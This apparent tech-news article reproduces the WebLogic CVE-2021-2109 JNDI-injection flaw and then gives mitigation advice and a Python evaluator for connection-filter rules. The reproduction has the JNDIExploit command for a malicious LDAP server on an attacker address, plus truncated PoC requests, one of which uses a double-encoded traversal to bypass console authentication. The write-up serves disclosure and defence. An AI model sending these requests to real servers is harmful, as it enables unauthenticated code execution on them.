2025-04-09 update, from: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article reproduces and analyzes the WebLogic Server remote code execution vulnerability CVE-2021-2109, showing both the authenticated attack path and the unauthenticated path through the console authentication bypass, followed by mitigation advice.
In January 2021 Oracle released its Critical Patch Update, containing 329 new security patches across the Oracle product line. The announcement also points back to the Oracle WebLogic Server security alert for CVE-2020-14750 issued on November 1, 2020, and strongly recommends that customers apply that patch together with the other patches in the update. Among the WebLogic fixes is CVE-2021-2109, a remote code execution vulnerability in the WebLogic administration console. The root cause is JNDI injection: the console's JNDI binding page accepts a JndiBindingHandle whose argument, an ldap:// URL supplied in the request, is passed into a JNDI lookup, so an attacker who can reach the console can point that lookup at a malicious LDAP server and have WebLogic load and execute a remote object. Reaching the console requires either valid administrator credentials or the CVE-2020-14750 authentication bypass; both cases are reproduced below.
The affected versions are as follows:
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
I. CVE-2021-2109 WebLogic Server remote code execution vulnerability reproduction
Build a WebLogic Server test environment with Docker and confirm that the server and its console are reachable before starting.
1. JNDI injection after a normal login to the administration console
In the first case, you log in to the WebLogic Server administration console with an administrator account, capture the login request with Burp Suite, and take the session cookie from it for use in the exploit request.
Start the malicious LDAP server locally with JNDIExploit, downloaded from https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Here 192.168.131.1 is the attacker's address that WebLogic will connect back to; the command is:
java -jar JNDIExploit-v1.11.jar -i 192.168.131.1
Send the CVE-2021-2109 JNDI injection PoC request with the captured cookie. The parameter ending in "handle" carries a JndiBindingHandle whose argument is an ldap:// URL pointing at the JNDIExploit server started above:
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap...
The command to run is supplied through the cmd variable of the request; here ipconfig is executed on the server and its output is returned.
2. JNDI injection combined with the WebLogic Server console unauthorized-access vulnerability
In the second case, no login to the WebLogic Server console is needed.
Chained with CVE-2020-14750, the console authentication bypass, the same JNDI injection request is sent through the double-URL-encoded path traversal under /console/css/ (%25%32%65%25%32%65%25%32%66 decodes to %2e%2e%2f and then to ../), which the console serves without authentication:
POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap...
Passing calc.exe in the cmd variable opens the system calculator on the server, confirming unauthenticated code execution. Note that the parameter name differs from the first request (cqqhandle instead of JNDIBindingPortlethandle): what the console acts on is the "handle" suffix, so the name itself is not a reliable detection signature.
II. Security recommendations for the CVE-2021-2109 WebLogic Server remote code execution vulnerability
1. Disable the T3 protocol
If your deployment does not rely on T3 (WebLogic's proprietary RMI protocol) for communication with the JVM, you can temporarily block T3 with a connection filter. Note that CVE-2021-2109 itself is delivered over HTTP to the administration console, as the requests above show, so this step and the IIOP setting below are general WebLogic hardening against T3/IIOP deserialization attacks rather than a fix for this vulnerability; items 3 and 4 are what actually close it.
1) In the WebLogic console, open the base_domain configuration page, go to the Security tab, click Filter, and configure the connection filter.
2) Enter weblogic.security.net.ConnectionFilterImpl as the connection filter, and enter the rule * * 7001 deny t3 t3s in the connection filter rules box (replace 7001 with the server's actual listen port).
2. Disable IIOP
Log in to the WebLogic console, locate the Enable IIOP option, uncheck it, and restart the server for the change to take effect.
3. Temporarily block external access to the console at /console/console.portal, for example by restricting the admin port to the administrative network at the firewall or connection filter.
4. Apply the official security patch from the Oracle January 2021 Critical Patch Update.
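The connection filter rule in item 1 is easier to reason about with a small evaluator. The following is an added example (not WebLogic code) that parses rules in the ConnectionFilterImpl format, "target localAddress localPort action [protocols]", and applies them the way WebLogic documents: first matching rule wins, and a connection matching no rule is allowed. It shows that the rule * * 7001 deny t3 t3s leaves HTTP access to port 7001, and therefore the console attack path, open, and contrasts it with a stricter ruleset that limits the admin port to an assumed admin subnet 10.0.0.0/24. Targets are simplified to IP addresses or CIDR blocks (hostnames are not resolved), as noted in the comments.

```python
import ipaddress

# Protocol names accepted in WebLogic connection filter rules.
PROTOCOLS = {"http", "https", "t3", "t3s", "ldap", "ldaps", "iiop", "iiops", "com"}


def parse_rules(text):
    """Parse rules of the form: target localAddress localPort action [protocol ...]
    Simplifications (assumptions of this example): target is an IP or CIDR (hostnames
    are not resolved), localAddress is an IP or '*', and '#' starts a comment."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: expected 'target localAddr localPort action [protocols]'")
        target, local_addr, local_port, action = fields[:4]
        action = action.lower()
        if action not in ("allow", "deny"):
            raise ValueError(f"line {lineno}: action must be allow or deny, got {action!r}")
        protocols = {p.lower() for p in fields[4:]}
        unknown = protocols - PROTOCOLS
        if unknown:
            raise ValueError(f"line {lineno}: unknown protocol(s) {sorted(unknown)}")
        rules.append({
            "target": None if target == "*" else ipaddress.ip_network(target, strict=False),
            "local_addr": None if local_addr == "*" else ipaddress.ip_address(local_addr),
            "local_port": None if local_port == "*" else int(local_port),
            "action": action,
            "protocols": protocols,  # empty set means the rule covers every protocol
        })
    return rules


def evaluate(rules, remote_ip, local_port, protocol, local_addr=None):
    """First matching rule wins; a connection that matches no rule is allowed.
    local_addr=None means the local address is unknown, so only rules with '*' there match."""
    remote = ipaddress.ip_address(remote_ip)
    local = ipaddress.ip_address(local_addr) if local_addr else None
    protocol = protocol.lower()
    for r in rules:
        if r["target"] is not None and remote not in r["target"]:
            continue
        if r["local_addr"] is not None and local != r["local_addr"]:
            continue
        if r["local_port"] is not None and local_port != r["local_port"]:
            continue
        if r["protocols"] and protocol not in r["protocols"]:
            continue
        return r["action"]
    return "allow"


# The rule from the mitigation step above: deny T3/T3S on the admin listen port only.
T3_ONLY_RULES = "* * 7001 deny t3 t3s"

# A stricter ruleset for comparison; the admin network 10.0.0.0/24 is an assumption.
ADMIN_ONLY_RULES = """
10.0.0.0/24 * 7001 allow http https                    # admins keep console access
0.0.0.0/0   * 7001 deny  http https t3 t3s iiop iiops  # everyone else is cut off from the admin port
"""


def console_reachable(rules_text, remote_ip):
    """Can remote_ip still open an HTTP connection to the console port under these rules?"""
    return evaluate(parse_rules(rules_text), remote_ip, 7001, "http") == "allow"


if __name__ == "__main__":
    for label, rules in (("T3 only", T3_ONLY_RULES), ("admin only", ADMIN_ONLY_RULES)):
        print(f"{label}: console reachable from 203.0.113.10 = {console_reachable(rules, '203.0.113.10')}")
```

The evaluator is for reasoning about a ruleset before you apply it; the real filter is configured in the console as described in item 1. If the server listens on several ports, add a rule per port, because a rule with localPort 7001 says nothing about connections to 8001.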